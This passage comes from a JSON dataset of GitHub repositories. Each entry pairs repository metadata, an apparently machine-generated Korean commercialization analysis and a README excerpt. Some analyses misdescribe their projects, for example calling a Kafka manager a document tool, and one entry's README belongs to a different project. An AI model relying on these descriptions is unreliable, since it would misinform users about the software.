[Retrieval Augmented Generation](https://arxiv.org/pdf/2005.11401.pdf) (RAG). Search engines with exact-match, similar-match (i.e. using [Levenshtein distance](https://dl.acm.o","composite_score":0.1996,"license_safety_tag":"restricted"},{"name":"Camberi/firecms","github_url":"https://github.com/Camberi/firecms","stars":37,"language":"","license":"unknown","abandonment_months":10,"description":"# FireCMS 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 웹사이트나 앱의 데이터를 관리할 수 있도록 만든 관리 도구로, 개발자가 아닌 일반 담당자도 콘텐츠를 쉽게 수정할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 쇼핑몰이나 블로그 운영 회사가 고객들에게 제공하는 관리 대시보드\n- **내부 업무 도구**: 회사 제품의 ","readme_excerpt":"# firecms\nResponsible Disclosure Placeholder\n","composite_score":0.1994,"license_safety_tag":"unknown"},{"name":"calganaygun/MDcat","github_url":"https://github.com/calganaygun/MDcat","stars":9,"language":"Go","license":"unknown","abandonment_months":10,"description":"# MDcat 저장소 분석\n\n## 왜 보물인가\n마크다운 형식의 문서를 고양이처럼 자유롭게 다루고 변환할 수 있는 도구로, 문서 작업을 더 쉽고 빠르게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사용자가 작성한 마크다운 문서를 자동으로 정렬·분류·변환해주는 문서 관리 플랫폼\n- **내부 업무 도구**: 회사 내 기술 문서나 작업 보","readme_excerpt":"![Header image of MDcat](images/header.png)\n\n# MDCat\n\nMDcat converts Markdown documents to [GitHub styled](https://primer.style/) HTML by leveraging the GitHub Markdown API.\n\n## Features\n\n- Light/dark mode\n- Code highlighting\n\n## Installation\n\n### Prerequisites\n\n- Go 1.18 or later installed on your system.\n\n### Install from source\n\n1. Clone the repository:\n   ```sh\n   git clone https://github.com/calganaygun/MDcat.git\n   cd MDcat\n   ```\n\n2. Build the binary:\n   ```sh\n   go build -o mdcat mdcat.go\n   ```\n\n3. (Optional) Add to your PATH:\n   ```sh\n   sudo mv mdcat /usr/local/bin/\n   ```\n\n### Direct installation\n\nYou can also install directly using Go:\n```sh\ngo install github.com/calganaygun/MDcat@latest\n```\n\n## Usage\n\n```sh\nmdcat input.md\n# Or\nmdcat -i input.md -o output.html\n```\n\nThe generated HTML will be placed next to the input file.\n\n## Demo\n\nYou can see this README rendered [here](https://refined-github-html-preview.kidonng.workers.dev/calganaygun/MDcat/raw/main/README.html).\n\n## Th","composite_score":0.1993,"license_safety_tag":"unknown"},{"name":"redux-offline/redux-offline","github_url":"https://github.com/redux-offline/redux-offline","stars":7,"language":"JavaScript","license":"mit","abandonment_months":15,"description":"# redux-offline 평가 보고서\n\n## 왜 보물인가\n인터넷이 끊겨도 앱이 정상 작동하다가 연결되면 자동으로 동기화되는 기술로, 지하철·비행기 같은 오프라인 환경에서도 끊김 없는 사용 경험을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 협업 노트앱 SaaS**\n- 오프라인에서 문서 작성 → 온라인 복귀 시 자동 저장\n- Notion, Obsid","readme_excerpt":"<p>\n  <img alt=\"redux-offline\" src=\"docs/static/img/redux-offline.png\" width=\"300\"></img>\n</p>\n<p>\n  <a title='License' href=\"https://raw.githubusercontent.com/redux-offline/redux-offline/master/LICENSE\" height=\"18\">\n    <img src='https://img.shields.io/badge/license-MIT-blue.svg' />\n  </a>\n  <a href=\"https://badge.fury.io/js/%40redux-offline%2Fredux-offline\">\n    <img src=\"https://badge.fury.io/js/%40redux-offline%2Fredux-offline.svg\" alt=\"npm version\" height=\"18\">\n  </a>\n  <a href=\"https://travis-ci.org/redux-offline/redux-offline\">\n    <img src=\"https://travis-ci.org/redux-offline/redux-offline.svg?branch=master\" alt=\"travis\" height=\"18\">\n  </a>\n</p>\n\n🚨🚨🚨🚨 **Maintainers wanted**\n\n<br>\n\nPersistent Redux store for _Reasonaboutable_:tm: Offline-First applications, with first-class support for optimistic UI. Use with React, React Native, or as standalone state container for any web app.\n\n> Redux Offline is now being maintained by a community driven team. The new versions of the library ","composite_score":0.1991,"license_safety_tag":"safe"},{"name":"toniblyx/prowler","github_url":"https://github.com/toniblyx/prowler","stars":48,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Prowler 저장소 분석\n\n## 왜 보물인가\n기업의 클라우드 환경이 안전한지 자동으로 점검해주는 도구로, 보안 사고를 미리 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업 보안 점검 SaaS 서비스**\n- 중소기업들이 월 구독으로 자신의 클라우드 환경을 자동 진단받는 서비스\n- 매달 보안 리포트를 받아 위험요소를 쉽게 파악\n\n**2. ","readme_excerpt":"<p align=\"center\">\n  <img align=\"center\" src=\"https://github.com/prowler-cloud/prowler/blob/master/docs/img/prowler-logo-black.png#gh-light-mode-only\" width=\"50%\" height=\"50%\">\n  <img align=\"center\" src=\"https://github.com/prowler-cloud/prowler/blob/master/docs/img/prowler-logo-white.png#gh-dark-mode-only\" width=\"50%\" height=\"50%\">\n</p>\n<p align=\"center\">\n  <b><i>Prowler</b> is the Open Cloud Security Platform trusted by thousands to automate security and compliance in any cloud environment. With hundreds of ready-to-use checks and compliance frameworks, Prowler delivers real-time, customizable monitoring and seamless integrations, making cloud security simple, scalable, and cost-effective for organizations of any size.\n</p>\n<p align=\"center\">\n<b>Secure ANY cloud at AI Speed at <a href=\"https://prowler.com\">prowler.com</i></b>\n</p>\n\n<p align=\"center\">\n<a href=\"https://goto.prowler.com/slack\"><img width=\"30\" height=\"30\" alt=\"Prowler community on Slack\" src=\"https://github.com/prowler-cl","composite_score":0.1981,"license_safety_tag":"safe"},{"name":"rexxars/react-markdown","github_url":"https://github.com/rexxars/react-markdown","stars":5,"language":"JavaScript","license":"mit","abandonment_months":13,"description":"# react-markdown 프로젝트 분석\n\n## 왜 보물인가\n누구나 쉽게 글을 작성할 수 있는 마크다운 형식을 웹사이트에 예쁘게 표시해주는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **블로그/노트 SaaS**: 사용자가 쓴 글을 웹에서 깔끔하게 보여주는 노션, 미디엄 같은 서비스\n2. **고객 지원 도구**: 회사 내부에서 도움말, 가이드, 공","readme_excerpt":"<!--\n  Notes for maintaining this document:\n\n  * update the version of the link for `commonmark-html` once in a while\n-->\n\n# react-markdown\n\n[![Build][badge-build-image]][badge-build-url]\n[![Coverage][badge-coverage-image]][badge-coverage-url]\n[![Downloads][badge-downloads-image]][badge-downloads-url]\n[![Size][badge-size-image]][badge-size-url]\n\nReact component to render markdown.\n\n## Feature highlights\n\n* [x] **[safe][section-security] by default**\n  (no `dangerouslySetInnerHTML` or XSS attacks)\n* [x] **[components][section-components]**\n  (pass your own component to use instead of `<h2>` for `## hi`)\n* [x] **[plugins][section-plugins]**\n  (many plugins you can pick and choose from)\n* [x] **[compliant][section-syntax]**\n  (100% to CommonMark, 100% to GFM with a plugin)\n\n## Contents\n\n* [What is this?](#what-is-this)\n* [When should I use this?](#when-should-i-use-this)\n* [Install](#install)\n* [Use](#use)\n* [API](#api)\n  * [`Markdown`](#markdown)\n  * [`MarkdownAsync`](#markdownasync)\n  *","composite_score":0.198,"license_safety_tag":"safe"},{"name":"didi/LogiKM","github_url":"https://github.com/didi/LogiKM","stars":7,"language":"Java","license":"AGPL-3.0","abandonment_months":3,"description":"# didi/LogiKM 상용화 분석\n\n## 왜 보물인가\n기업 내부의 방대한 문서와 정보를 자동으로 정리하고 찾아주는 도구로, 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업용 문서 관리 클라우드 플랫폼으로 월정액 구독 모델 운영\n2. **내부 업무 도구**: 대기업의 사내 문서 검색·관리 시스템으로 ","readme_excerpt":"\n<p align=\"center\">\n<img src=\"https://user-images.githubusercontent.com/71620349/185368586-aed82d30-1534-453d-86ff-ecfa9d0f35bd.png\" width = \"256\"  div align=center />\n\n</p>\n\n<p align=\"center\">\n    <a href=\"https://knowstreaming.com\">产品官网</a> | \n    <a href=\"https://github.com/didi/KnowStreaming/releases\">下载地址</a> | \n    <a href=\"https://doc.knowstreaming.com/product\">文档资源</a> | \n    <a href=\"https://demo.knowstreaming.com\">体验环境</a> \n</p>\n\n<p align=\"center\">\n<!--最近一次提交时间-->\n<a href=\"https://img.shields.io/github/last-commit/didi/KnowStreaming\">\n    <img src=\"https://img.shields.io/github/last-commit/didi/KnowStreaming\" alt=\"LastCommit\">\n</a>\n\n<!--最新版本-->\n<a href=\"https://github.com/didi/KnowStreaming/blob/master/LICENSE\">\n    <img src=\"https://img.shields.io/github/v/release/didi/KnowStreaming\" alt=\"License\">\n</a>\n\n<!--License信息-->\n<a href=\"https://github.com/didi/KnowStreaming/blob/master/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/didi/KnowStreaming\" alt=\"License\">\n","composite_score":0.1979,"license_safety_tag":"risky"},{"name":"didi/Logi-KafkaManager","github_url":"https://github.com/didi/Logi-KafkaManager","stars":7,"language":"Java","license":"AGPL-3.0","abandonment_months":3,"description":"# Logi-KafkaManager 상용화 분석\n\n## 왜 보물인가\n복잡한 메시지 시스템을 쉽게 관리할 수 있는 도구로, 대량의 데이터를 다루는 기업들의 운영 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 스타트업이 자체 메시지 시스템을 관리하기 위한 클라우드 기반 관리 도구 구독 판매\n- **내부 업무 도구**: ","readme_excerpt":"\n<p align=\"center\">\n<img src=\"https://user-images.githubusercontent.com/71620349/185368586-aed82d30-1534-453d-86ff-ecfa9d0f35bd.png\" width = \"256\"  div align=center />\n\n</p>\n\n<p align=\"center\">\n    <a href=\"https://knowstreaming.com\">产品官网</a> | \n    <a href=\"https://github.com/didi/KnowStreaming/releases\">下载地址</a> | \n    <a href=\"https://doc.knowstreaming.com/product\">文档资源</a> | \n    <a href=\"https://demo.knowstreaming.com\">体验环境</a> \n</p>\n\n<p align=\"center\">\n<!--最近一次提交时间-->\n<a href=\"https://img.shields.io/github/last-commit/didi/KnowStreaming\">\n    <img src=\"https://img.shields.io/github/last-commit/didi/KnowStreaming\" alt=\"LastCommit\">\n</a>\n\n<!--最新版本-->\n<a href=\"https://github.com/didi/KnowStreaming/blob/master/LICENSE\">\n    <img src=\"https://img.shields.io/github/v/release/didi/KnowStreaming\" alt=\"License\">\n</a>\n\n<!--License信息-->\n<a href=\"https://github.com/didi/KnowStreaming/blob/master/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/didi/KnowStreaming\" alt=\"License\">\n","composite_score":0.1979,"license_safety_tag":"risky"},{"name":"opencamp-cn/Rust-Professional","github_url":"https://github.com/opencamp-cn/Rust-Professional","stars":11,"language":"Rust","license":"NOASSERTION","abandonment_months":16,"description":"","readme_excerpt":"","composite_score":0.1978,"license_safety_tag":"unknown"},{"name":"webtorrent/webtorrent","github_url":"https://github.com/webtorrent/webtorrent","stars":6,"language":"JavaScript","license":"mit","abandonment_months":1,"description":"# WebTorrent 저장소 분석\n\n## 왜 보물인가\n인터넷 브라우저에서 직접 파일을 주고받을 수 있도록 만드는 기술로, 중앙 서버 없이도 사용자들이 영상·음악·문서를 공유할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. P2P 파일 공유 SaaS**\n기업이나 개인이 구독하면 서버 비용 없이 대용량 파일을 안전하게 나눌 수 있는 클라우드 서비스로 출","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <a href=\"https://webtorrent.io\"><img src=\"https://webtorrent.io/img/WebTorrent.png\" alt=\"WebTorrent\" width=\"200\"></a>\n  <br>\n  WebTorrent\n  <br>\n  <br>\n</h1>\n\n<h4 align=\"center\">The streaming torrent client. For node.js and the web.</h4>\n\n<p align=\"center\">\n  <a href=\"https://discord.gg/cnXkm4Z\"><img src=\"https://img.shields.io/discord/612575111718895616\" alt=\"discord\"></a>\n  <a href=\"https://github.com/webtorrent/webtorrent/actions\"><img src=\"https://img.shields.io/github/actions/workflow/status/webtorrent/webtorrent/ci.yml?branch=master\" alt=\"ci\"></a>\n  <a href=\"https://www.npmjs.com/package/webtorrent\"><img src=\"https://img.shields.io/npm/v/webtorrent.svg\" alt=\"npm version\"></a>\n  <a href=\"https://www.npmjs.com/package/webtorrent\"><img src=\"https://img.shields.io/npm/dm/webtorrent.svg\" alt=\"npm downloads\"></a>\n  <a href=\"https://standardjs.com\"><img src=\"https://img.shields.io/badge/code_style-standard-brightgreen.svg\" alt=\"Standard - JavaScript Style Gu","composite_score":0.1977,"license_safety_tag":"safe"},{"name":"aduskin/AduSkin","github_url":"https://github.com/aduskin/AduSkin","stars":8,"language":"C#","license":"GPL-3.0","abandonment_months":9,"description":"# AduSkin 저장소 분석\n\n## 왜 보물인가\n스킨(UI 외관) 시스템을 만드는 도구로, 개발자가 아닌 디자이너도 프로그램의 모양을 쉽게 바꿀 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 사용자가 선호하는 테마(밝기, 색상 등)를 직접 선택할 수 있는 온라인 협업 도구\n2. **내부 업무 도구**: 대기업 직원들이 회","readme_excerpt":"# AduSkin\n追求极致，永臻完美\n\nA Beautiful WPF Control UI\n\n当前项目已停止维护，建议使用新版本。\nhttps://github.com/AduDesign/AduSkin-Preview \n\n技术交流\n\n|联系方式||\n|---|---\n|QQ|1280429435\n|QQ群1|[544471417](https://jq.qq.com/?_wv=1027&k=5NBE1xa)\n|QQ群2|[224087477](https://jq.qq.com/?_wv=1027&k=58vo7dL)\n|QQ群3|[252480168](https://jq.qq.com/?_wv=1027&k=5fyhmof)\n\n### 贡献者\n\n<a href=\"https://github.com/aduskin\" target=\"_blank\"><img width=\"64px\" src=\"https://avatars2.githubusercontent.com/u/33409777?s=460&u=536aecd59ce72fa64b09d2279821227bc6a721da&v=4\"></a>\n<a href=\"https://github.com/John0King\" target=\"_blank\"><img width=\"64px\" src=\"https://avatars0.githubusercontent.com/u/13639146?s=460&u=b6e8111b1285c86efcf7576758e06d7518cc8601&v=4\"></a>\n<a href=\"https://github.com/guanguanchuangyu\" target=\"_blank\"><img width=\"64px\" src=\"https://avatars0.githubusercontent.com/u/25916858?s=460&u=7eab6998abb6a32d8a87f2a453e5d382cfff97e4&v=4\"></a>\n<a href=\"https://github.com/dotnet9\" target=\"_blank\"><img width=\"64px\" src=\"https://avatars2.githubu","composite_score":0.1974,"license_safety_tag":"restricted"},{"name":"artf/grapesjs","github_url":"https://github.com/artf/grapesjs","stars":8,"language":"TypeScript","license":"bsd-3-clause","abandonment_months":1,"description":"# GrapesJS 저장소 분석\n\n## 왜 보물인가\n프로그래밍 없이 웹사이트를 만들 수 있는 드래그앤드롭 편집기로, 개발자 없는 회사도 직접 웹페이지를 디자인하고 수정할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 빌더 SaaS**: 개인이나 소상공인이 자신의 포트폴리오, 가게 홍보 페이지를 직접 만들 수 있는 플랫폼\n2. **기업 내부","readme_excerpt":"# [GrapesJS](http://grapesjs.com)\n\n[![Build Status](https://github.com/GrapesJS/grapesjs/actions/workflows/quality.yml/badge.svg)](https://github.com/GrapesJS/grapesjs/actions)\n[![Chat](https://img.shields.io/badge/chat-discord-7289da.svg)](https://discord.gg/QAbgGXq)\n[![CDNJS](https://img.shields.io/cdnjs/v/grapesjs.svg)](https://cdnjs.com/libraries/grapesjs)\n[![npm](https://img.shields.io/npm/v/grapesjs.svg)](https://www.npmjs.com/package/grapesjs)\n\n> If you looking to embed the [Studio](https://app.grapesjs.com/studio) editor in your application, we now offer the [Studio SDK](https://app.grapesjs.com/dashboard/sdk/licenses?ref=repo-readme), a ready-to-use visual builder that's easy to embed in external applications, with GrapesJS team support included.\n\n<p align=\"center\"><img src=\"http://grapesjs.com/assets/images/grapesjs-front-page-m.jpg\" alt=\"GrapesJS\" width=\"500\" align=\"center\"/></p>\n\nGrapesJS is a free and open source Web Builder Framework which helps building HTML templates, f","composite_score":0.1972,"license_safety_tag":"safe"},{"name":"chyyuu/aos_course_info","github_url":"https://github.com/chyyuu/aos_course_info","stars":18,"language":"C","license":"CC0-1.0","abandonment_months":10,"description":"# chyyuu/aos_course_info 보물 분석\n\n## 왜 보물인가\n대학교의 운영체제 강의 자료를 체계적으로 정리해둔 교육 자료 모음으로, 프로그래밍 교육 콘텐츠 시장에서 검증된 커리큘럼을 쉽게 재활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n**1. 온라인 교육 플랫폼 SaaS**\n프로그래밍 초보자向 운영체제 강좌 구성용 교육 콘텐츠 패키지로 활","readme_excerpt":"# Advanced OS Course (2024 Autumn)\n\n## course id\n - 80240442\n\n## Time & Place\n - 1~16 weeks\n - Wednesday (15:20-16:55)　\n - 6A307 classroom, 6th teaching building\n \n## Objectives\n - Gain experience in doing OS research\n - Know how to read/write papers/reports\n - Know current OS hot topics\n - Develop and analyze OS projects \n\n## Scheduling\n\n- [Old videos&slides](https://next.xuetangx.com/course/thu080917777/3234209)\n- [Scheduling Overview](aos-scheduling.md)\n- [Scheduling Details](https://github.com/LearningOS/aos-lectures/blob/master/aos-course-outline.md)\n\n## ReadingList\n- [Classic/Hot OS PaperList](readinglist.md)\n\n## Simple OS Tutorial Labs\n- [os_tutorial_lab](https://github.com/chyyuu/os_tutorial_lab/)\n\n## Instructor Info\n- yuchen AT tsinghua.edu.cn\n\n## other AOS courses\n- [related os courses](related-course-info.md)\n\n## paper/project info about interesting OS topics\n- [OS related examples/tutorials/demos](https://github.com/oscomp/os-competition-info/blob/main/ref-info.md)\n- [info ","composite_score":0.1963,"license_safety_tag":"unknown"},{"name":"byoungd/english-level-up-tips-for-Chinese","github_url":"https://github.com/byoungd/english-level-up-tips-for-Chinese","stars":6,"language":"","license":"unknown","abandonment_months":1,"description":"# English Level Up Tips for Chinese 상용화 분석\n\n## 왜 보물인가\n중국 학습자들을 위해 체계적으로 정리된 영어 학습 노하우를 디지털 상품으로 패키징하면, 수십만 명의 잠재 고객에게 팔 수 있는 콘텐츠 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **영어 학습 앱 구독 서비스**: 한국인/중국인 대상 맞춤형 영어 강의 플랫폼으로","readme_excerpt":"[`简体中文`](docs/README.md) | [`English`](docs/en/README.md)\n\n谨以此献给我曾今的挚爱 `W.`\n\n> 我们每个人都生活在各自的过去中，人们会用一分钟的时间去认识一个人，用一小时的时间去喜欢一个人，再用一天的时间去爱上一个人，到最后呢，却要用一辈子的时间去忘记一个人。\n\n![](./docs/assets/my-love.png)\n\n# 项目介绍\n\nAn advanced guide to learn English which might benefit you a lot.\n\n[离谱的英语学习指南/英语学习教程](https://github.com/byoungd/English-level-up-tips)。\n\n## 推荐资源：ku0.com - 库\n\n如果你在使用本指南里的 AI 学习方案时，需要更稳定、可信的 AI 账户与接口资源，可以看看我们的产品：[ku0.com - 库](https://ku0.com)。\n\n`ku0.com` 是一个可信任 AI 资源库，可一站式获取 `ChatGPT`、`Claude`、`Gemini` 账户充值、成品号和号池资源。我们用 Token 质检和统一网关筛掉不稳定、掺水、冒名的中转服务，并通过可信账户资源、质检报告和接入记录，帮助你降低 AI 使用成本与采购风险。\n\n## 背景\n\n你好啊朋友，欢迎来到[离谱的英语学习指南](https://github.com/byoungd/English-level-up-tips)。\n\n当你的目光与这些文字相遇，我衷心希望，这不仅仅是一次攻克英语的艰苦征程，更是一场开启智慧之门的奇妙冒险。愿这方寸纸墨，化作你我心灵共鸣的琴弦，弹奏出语言学习的天籁妙音。\n\n时间回到 2017 年 7 月初，备考托福的女神`W.`问了我一个问题：**如何高效学习英语？**\n\n在我思考如何回答这个问题时，回想起我在大四一学期一次性考过 26 门课的经验（其中重修 19 门，当前学期 7 门），再加上本人`英语` 和 `语文` 两门学科曾**侥幸**在高考时摘得省第一（江苏卷），或许我勉强有资格提供一些`高效学习`的`小技巧`，权当抛砖引玉。\n\n与她交流了一番学习心得后，我惊讶于她在学习方面的热情竟是如此之高，同时也发现了她的学习方法存在一些`不","composite_score":0.1957,"license_safety_tag":"unknown"},{"name":"matter-labs/awesome-zero-knowledge-proofs","github_url":"https://github.com/matter-labs/awesome-zero-knowledge-proofs","stars":5,"language":"","license":"NOASSERTION","abandonment_months":4,"description":"# awesome-zero-knowledge-proofs 상용화 분석\n\n## 왜 보물인가\n암호화폐와 블록체인 산업이 성장하면서 필요한 '증명 기술' 관련 지식을 한곳에 정리한 학습 자료 모음으로, 이 분야 진입장벽을 크게 낮춥니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블록체인 개발자 교육 플랫폼으로, 영상 강의 + 코드 예제를 판매\n2","readme_excerpt":"# Awesome zero knowledge proofs (zkp)\n\n> [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)\n> A curated list of awesome things related to learning zero knowledge proofs\n\n## Contents\n\n- [Awesome zero knowledge proofs (zkp)](#awesome-zero-knowledge-proofs-zkp)\n  - [Contents](#contents)\n  - [General introduction](#general-introduction)\n  - [Courses](#courses)\n  - [Use cases](#use-cases)\n  - [Applications](#applications)\n    - [Ethereum](#ethereum)\n    - [Other blockchains](#other-blockchains)\n    - [Non-blockchain](#non-blockchain)\n  - [Comparison of the most popular zkp systems](#comparison-of-the-most-popular-zkp-systems)\n  - [Bulletproofs](#bulletproofs)\n    - [Try](#try)\n    - [Proof system implementations](#proof-system-implementations)\n    - [Halo](#halo)\n  - [SNARKs](#snarks)\n    - [Learn](#learn)\n    - [Try](#try-1)\n    - [Scaling the prover](#scaling-the-prover)\n    - [Multi-Party Ceremony (MPC) for Trusted Setup](#multi-party-ceremony-mpc-for-trusted-setup)\n  - [SNOR","composite_score":0.1956,"license_safety_tag":"unknown"},{"name":"4GeeksAcademy/html-hello","github_url":"https://github.com/4GeeksAcademy/html-hello","stars":247,"language":"Python","license":"NOASSERTION","abandonment_months":2,"description":"","readme_excerpt":"","composite_score":0.1955,"license_safety_tag":"unknown"},{"name":"pawelborkar/awesome-repos","github_url":"https://github.com/pawelborkar/awesome-repos","stars":9,"language":"","license":"CC0-1.0","abandonment_months":9,"description":"# awesome-repos 상품화 분석\n\n## 왜 보물인가\n좋은 개발 도구와 라이브러리를 한곳에 모아놓은 큐레이션 목록으로, 개발자들이 시간 낭비 없이 필요한 도구를 빠르게 찾을 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 SaaS**: 큐레이션된 도구 목록을 구독형으로 제공하며, 월간 신규 도구 추천과 커뮤니티 평점 기능 추","readme_excerpt":"<div align='center'>\n\n# Awesome Repositories\n\n_A curated list of GitHub Repositories full of FREE Resources._ <br>\n\n![Message](https://img.shields.io/badge/I%20%E2%9D%A4%20-OpenSource-%23ff0055) ![Awesome-Repos](https://img.shields.io/badge/Awesome--repos-%23ff0055) ![GitHub](https://img.shields.io/github/license/pawelborkar/awesome-repos?color=%23ff0055)\n\n</div> <br>\n\n> _Pull Requests are being welcomed.Please see the [Contributing Guide](CONTRIBUTING.md) before opening a Pull Request._\n\n## Index\n\n-   [API](#api)\n-   [Artificial Intelligence](#artificial-intelligence)\n-   [Awesome](#awesome)\n-   [BackEnd](#backend)\n-   [Books](#books)\n-   [Career](#career)\n-   [CheatSheets](#cheatsheets)\n-   [Cloud](#cloud)\n-   [Competitive Programming](#competitive-programming)\n-   [Courses & Certifications](#courses--certifications)\n-   [Development](#development)\n-   [Education](#education)\n-   [Frameworks](#frameworks)\n-   [FrontEnd](#frontend)\n-   [Opportunities & Programs](#opportunities--progra","composite_score":0.1955,"license_safety_tag":"unknown"},{"name":"fossasia/wp-simple-twitter-feeds","github_url":"https://github.com/fossasia/wp-simple-twitter-feeds","stars":11,"language":"","license":"unknown","abandonment_months":16,"description":"# wp-simple-twitter-feeds 상용화 분석\n\n## 왜 보물인가\n웹사이트에 트위터(X) 게시물을 자동으로 표시해주는 도구로, 별도 개발 없이 누구나 쉽게 자신의 웹사이트를 최신 소식으로 채울 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 중소 기업과 블로거를 위한 '웹사이트 자동 뉴스피드 생성 서비스'로 운영 (월 ","readme_excerpt":"# Badge Magic LED Badge\n\n**Magically Create Text and Draw Cliparts on LED Name Badges using Bluetooth**\n\nThe Badge Magic Android app lets you create moving text and draw clipart for LED name badges. The app provides options to portray names, cliparts, and simple animations on the badges. For the data transfer from the smartphone to the LED badge it uses Bluetooth.\n\n| <!-- -->    | <!-- -->    | <!-- -->    |\n|-------------|-------------|-------------|\n| <img src=\"./img/screen-1.jpg\" width=\"288\" /> <img src=\"./img/screen-1-hard.png\" width=\"288\" /> | <img src=\"./img/screen-2.jpg\" width=\"288\" /> <img src=\"./img/screen-2-hard.png\" width=\"288\" /> | <img src=\"./img/screen-3.jpg\" width=\"288\" /> <img src=\"./img/screen-3-hard.png\" width=\"288\" /> |\n\n\n## Android\n\n* [Google Playstore](https://play.google.com/store/apps/details?id=org.fossasia.badgemagic)\n* [Fdroid](https://f-droid.org/en/packages/org.fossasia.badgemagic/)\n\n## iOS\n\n* [Badge Magic App on Apple store](https://apps.apple.com/us/app/ba","composite_score":0.1952,"license_safety_tag":"unknown"},{"name":"fossasia/open-event-server","github_url":"https://github.com/fossasia/open-event-server","stars":10,"language":"Python","license":"GPL-3.0","abandonment_months":2,"description":"# fossasia/open-event-server 평가\n\n## 왜 보물인가\n행사(컨퍼런스, 축제, 세미나)를 온라인에서 쉽게 만들고 관리할 수 있는 완성된 플랫폼으로, 전 세계 수천 개 행사가 이미 사용 중입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 행사 조직사에게 월구독 방식의 행사 관리 플랫폼 제공\n2. **내부 업무 도구*","readme_excerpt":"# Open Event Server\n\n![Open Event Server](/docs/images/open-event-server.png)\n\n[![GitHub release](https://img.shields.io/github/release/fossasia/open-event-server.svg)](https://github.com/fossasia/open-event-server/releases/latest)\n[![Build Status](https://travis-ci.org/fossasia/open-event-server.svg?branch=development)](https://travis-ci.org/fossasia/open-event-server)\n[![CircleCI Build Staus Badge](https://img.shields.io/circleci/build/github/fossasia/open-event-server?label=CircleCI%20Build)](https://www.circleci.com/gh/fossasia/open-event-server)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/f5036c0e23b44270ad24397e338b8412)](https://www.codacy.com/gh/fossasia/open-event-server/dashboard?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=fossasia/open-event-server&amp;utm_campaign=Badge_Grade)\n[![Codecov branch](https://codecov.io/gh/fossasia/open-event-server/branch/development/graph/badge.svg?style=flat-square)](https://codecov.io/gh/fossasia/open-event-s","composite_score":0.1951,"license_safety_tag":"restricted"},{"name":"toniblyx/my-arsenal-of-aws-security-tools","github_url":"https://github.com/toniblyx/my-arsenal-of-aws-security-tools","stars":7,"language":"Shell","license":"Apache-2.0","abandonment_months":1,"description":"# AWS 보안 도구 모음 분석\n\n## 왜 보물인가\n기업들이 클라우드에 저장한 민감한 데이터가 제대로 보호되고 있는지 자동으로 점검해주는 도구 모음이라 보안 담당자들의 필수 유틸로 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **보안 진단 SaaS**: 기업의 AWS 클라우드 환경을 자동 스캔하고 위험 요소를 리포트하는 웹 서비스\n- **기업 내부 보안","readme_excerpt":"\n## Table of Contents\n\n- [Contribute](#contribute)\n- [Defensive](#defensive-hardening-security-assessment-and-inventory)\n- [Offensive](#offensive)\n- [Purple Teaming & Adversary Emulation](#purple-teaming--adversary-emulation)\n- [Continuous Security Auditing](#continuous-security-auditing)\n- [Digital Forensics and Incident Response](#digital-forensics-and-incident-response)\n- [Development Security](#development-security)\n- [S3 Buckets Auditing](#s3-buckets-auditing)\n- [Training](#training)\n- [Other interesting tools/code](#other-interesting-toolscode)\n\n## Contribute\nDo you want to contribute to this list? Feel free to send a PR and make sure your tool is [Open Source](https://en.wikipedia.org/wiki/Open_source).\n\n\n| Name | Description | Popularity | Metadata |\n| ---------- | :---------- | :----------: | :----------: |\n| **[My Arsenal of AWS Security Tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)** | This list of open source tools for AWS security: defensive, offensi","composite_score":0.1943,"license_safety_tag":"safe"},{"name":"cosmicpython/book","github_url":"https://github.com/cosmicpython/book","stars":12,"language":"Python","license":"NOASSERTION","abandonment_months":9,"description":"# cosmicpython/book 분석\n\n## 왜 보물인가\n소프트웨어 개발 시 발생하는 복잡한 문제들을 체계적으로 해결하는 방법론을 알려주는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 교육 플랫폼**: 개발자 교육을 제공하는 온라인 코스 서비스로 월 구독료 수취\n2. **기업 내부 교육 도구**: 대기업의 신입 개발자 온보딩 프로그램으","readme_excerpt":"# Book repo\n\n| Book | Code |\n| ---- | ---- |\n| [![Book Build Status](https://travis-ci.org/cosmicpython/book.svg?branch=master)](https://travis-ci.org/cosmicpython/book) | [![Code build status](https://travis-ci.org/cosmicpython/code.svg?branch=master)](https://travis-ci.org/cosmicpython/code) |\n\n\n## Table of Contents\n\nO'Reilly have generously said that we will be able to publish this book under a [CC license](license.txt),\nIn the meantime, pull requests, typofixes, and more substantial feedback + suggestions are enthusiastically solicited.\n\n| Chapter |       |\n| ------- | ----- |\n| [Preface](preface.asciidoc) | |\n| [Introduction: Why do our designs go wrong?](introduction.asciidoc)| ||\n| [**Part 1 Intro**](part1.asciidoc) | |\n| [Chapter 1: Domain Model](chapter_01_domain_model.asciidoc) | [![Build Status](https://travis-ci.org/cosmicpython/code.svg?branch=chapter_01_domain_model)](https://travis-ci.org/cosmicpython/code) |\n| [Chapter 2: Repository](chapter_02_repository.asciidoc) | 